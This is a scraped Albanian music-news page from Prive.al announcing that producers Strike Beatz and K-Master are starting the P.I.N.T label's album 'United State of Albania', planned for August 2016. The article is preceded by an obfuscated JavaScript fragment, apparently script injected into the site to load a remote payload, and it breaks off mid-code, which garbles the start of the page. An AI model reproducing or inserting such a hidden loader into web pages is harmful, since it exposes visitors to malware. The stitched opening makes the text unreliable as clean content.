;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

K-MASTER E STRIKE BEATZ NISIN PUNËN PËR ALBUMIN E RI

By

Si shtëpi muzikore, P.I.N.T u zyrtarizua më 2011 kur edhe u lançua albumi me të njejtin emër nga MC Kresha e Lyrical Son.

Nga ajo kohë, ky grup nuk është ndalur me krijime muzikore që kanë rezultuar shumë të sukseshme në llojin e muzikës që kultivojnë.

Që nga tani, producentet e labelit kanë përvjelur mëngët duke nisur punën për krijimin e albumit të titulluar ‘United State of Albania’ i cili për fansat, nëse gjithçka shkon në rregull, mendohet të jetë gati ditën e parë të muajit Gusht 2016.

E nga vetë titulli, kuptohet koncepti i dyshes që synon të grumbullojë nën një produkt emra shqiptar të afirmuar nga të gjitha trojet pa dallim të grupeve muzikore.

Për komponimin e materialeve do të përkujdesen Strike Beatz dhe K- Master, kurse fansat do mbahen të informuar lidhur me rrjedhën e projektit përmes videove që do postohen në kanalin e kësaj shtëpie muzikore.

Për pikën më të rëndësishme, atë të artistëve që do marrin pjesë në ‘United State of Albania’, Prive do ju mbajë të informuar posa të ketë zhvillime zyrtare. /Prive.al/

Artikuj të ngjashëm